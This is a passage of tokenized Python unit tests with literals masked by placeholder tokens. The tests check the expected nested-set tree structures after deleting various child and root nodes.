<NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . 
_delete_helper ( name , result ) <EOL> def test_del_child2121 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , 
'<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child2122 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , 
{ '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child21221 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> 
, '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . 
_delete_helper ( name , result ) <EOL> def test_del_child21222 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , 
'<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child22 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { 
'<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child23 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : 
<NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . 
_delete_helper ( name , result ) <EOL> def test_del_root3 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , 
'<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> combined_del_result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:16> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ 